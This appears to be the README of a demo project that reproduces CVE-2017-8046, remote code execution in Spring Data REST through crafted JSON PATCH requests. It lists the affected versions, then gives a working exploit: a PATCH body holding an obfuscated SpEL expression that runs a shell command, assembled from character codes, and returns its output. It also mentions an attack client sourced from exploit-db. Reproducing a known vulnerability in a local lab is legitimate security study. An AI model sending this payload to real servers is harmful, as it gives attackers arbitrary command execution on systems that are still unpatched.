Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code.
- Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)
- Spring Boot (if Spring Data REST module is used) versions prior to 1.5.9, 2.0 M6
More info: https://pivotal.io/security/cve-2017-8046
It is a Spring Boot application with embedded Tomcat, so run the main class SpringRestDataExploitExampleApplication
To make a successful exploit test, run the following POST:
POST http://localhost:8080/users
Content-Type: application/json
{
"name": "Test",
"email": "test@test.com"
}
PATCH http://localhost:8080/users/1
Content-Type: application/json-patch+json
[{
"op": "replace",
"path": "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec((T(java.lang.System).getProperty(\"os.name\").toLowerCase().contains(\"win\")?\"cmd \"+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+\"c \":\"\")+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(112)[0],T(java.lang.Character).toChars(99)[0],T(java.lang.Character).toChars(111)[0],T(java.lang.Character).toChars(110)[0],T(java.lang.Character).toChars(102)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(103)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x",
"value": "pwned"
}]
The previous PATCH sends the result of the ifconfig command back from server to you.
I have attached a more flexible client to make your own tests: the class SpringBreakCve20178046 with its own command line. Source code comes from https://www.exploit-db.com/exploits/44289.